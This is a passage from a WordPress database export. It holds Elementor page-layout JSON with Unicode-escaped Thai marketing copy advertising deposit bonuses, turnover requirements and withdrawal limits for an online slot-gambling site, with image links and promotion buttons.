data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2178,308,'_thumbnail_id','282'),(2182,309,'_elementor_edit_mode','builder'),(2183,309,'_elementor_template_type','wp-page'),(2184,309,'_elementor_version','3.32.5'),(2185,309,'_elementor_pro_version','3.32.3'),(2186,309,'_wp_page_template','default'),(2187,309,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2188,309,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/20_get_100_-_Megabet333-Biz.webp\",\"id\":161,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_get_200_7turn_-_Megabet333-Biz.webp\",\"id\":157,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Free_bonus_100_-_Megabet333-Biz.webp\",\"id\":158,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 